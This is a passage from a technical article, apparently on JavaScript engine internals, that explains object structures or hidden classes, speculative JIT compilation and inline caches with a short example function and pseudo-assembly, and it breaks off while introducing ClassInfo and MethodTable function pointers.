Whenever this piece of code was executed again, the correct structure for
the created object would then be easy to find.
Essentially the same concept is used by all major engines today. V8 calls
them maps or hidden classes [19] while Spidermonkey calls them Shapes.
This technique also makes speculative JIT compilers simpler. Assume the
following function:
function foo(a) {
return a.bar + 3;
}
Assume further that we have executed the above function a couple of times
inside the interpreter and now decide to compile it to native code for
better performance. How do we deal with the property lookup? We could
simply jump out to the interpreter to perform the lookup, but that would be
quite expensive. Assuming we've also traced the objects that were given to
foo as arguments and found out they all used the same structure. We can now
generate (pseudo-)assembly code like the following. Here r0 initially
points to the argument object:
mov r1, [r0 + #structure_id_offset];
cmp r1, #structure_id;
jne bailout_to_interpreter;
mov r2, [r0 + #inline_property_offset];
This is just a few instructions slower than a property access in a native
language such as C. Note that the structure ID and property offset are
cached inside the code itself, thus the name for these kind of code
constructs: inline caches.
Besides the property mappings, structures also store a reference to a
ClassInfo instance. This instance contains the name of the class
("Float64Array", "HTMLParagraphElement", ...), which is also accessible
from script via the following slight hack:
Object.prototype.toString.call(object);
// Might print "[object HTMLParagraphElement]"
However, the more important property of the ClassInfo is its MethodTable
reference. A MethodTable contains a set of function pointers, similar to a